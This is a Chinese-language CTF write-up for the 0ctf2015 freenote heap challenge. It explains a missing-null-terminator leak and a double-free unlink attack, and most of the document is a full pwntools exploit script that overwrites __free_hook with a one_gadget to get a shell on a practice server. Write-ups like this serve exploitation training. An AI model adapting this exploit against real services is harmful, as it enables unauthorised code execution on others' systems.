0ctf2015_freenote

0ctf2015_freenote

查看保护

第一个漏洞，没有\x00

第二个漏洞，没有清0，这里看成uaf就行
攻击思路：借助第一个漏洞泄露出heap_addr和libc。借助第二个漏洞形成double free进行unlink攻击
1.泄露heap_addr和libc
因为read的时候没有\x00，所以释放成unsortedbin再申请回来的时候填满fd,show的时候可以带着bk一同输出。

2.heap全都清掉，为unlink做准备
3.布置unlink，还要利用第二步heap全部清掉时合并到top_chunk中的chunk
4.因为第三步的unlink布置使得top_chunk中的chunk被使用，而delete可以达成double free所以执行unlink攻击
5.改0 chunk为free_hook改hook为one_gadget
注：unlink和double free利用手法可以看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25918)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice: '

def add(size, note):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Length of new note: ', str(size))
    r.sendafter('Enter your note:', note)

def show():
    r.sendlineafter(menu, '1')

def edit(index, size, note):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Note number: ', str(index))
    r.sendlineafter('Length of note: ', str(size))
    r.sendafter('Enter your note: ', note)

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Note number: ', str(index))

add(1, 'a') #0
add(1, 'a') #1
add(1, 'a') #2
add(1, 'a') #3

delete(0)
delete(2)

add(8, 'b' * 8)
add(8, 'c' * 8)
dbg()
show()

r.recvuntil('b' * 8)
heap_addr = u64(r.recv(4).strip().ljust(8, b'\x00')) - 0x1940
li('[+] heap_addr = ' + hex(heap_addr))

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))  - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))

libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']

one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[1] + libc_base

fd = p64(heap_addr + 0x30 - 0x18)
bk = p64(heap_addr + 0x30 - 0x10)

delete(3)
delete(2)
delete(1)
delete(0)

#p1 = p64(0) + p64(0x31) + fd + bk + p64(0x20) + p64(0)
p1 = p64(0) + p64(0x51) + fd + bk
p1 += b'A' * 0x30 + p64(0x50) + p64(0x20)
add(len(p1), p1)

p2 = b'A' * 0x80 + p64(0x110) + p64(0x90) + b'A' * 0x80
p2 += p64(0) + p64(0x71) + b'A' * 0x60
add(len(p2), p2)

delete(2)

p3 = p64(8) + p64(0x1) + p64(0x8) + p64(free_hook) + b'A' * 0x40
edit(0, len(p3), p3)

edit(0, len(p64(one_gadget)), p64(one_gadget))

delete(1)

r.interactive()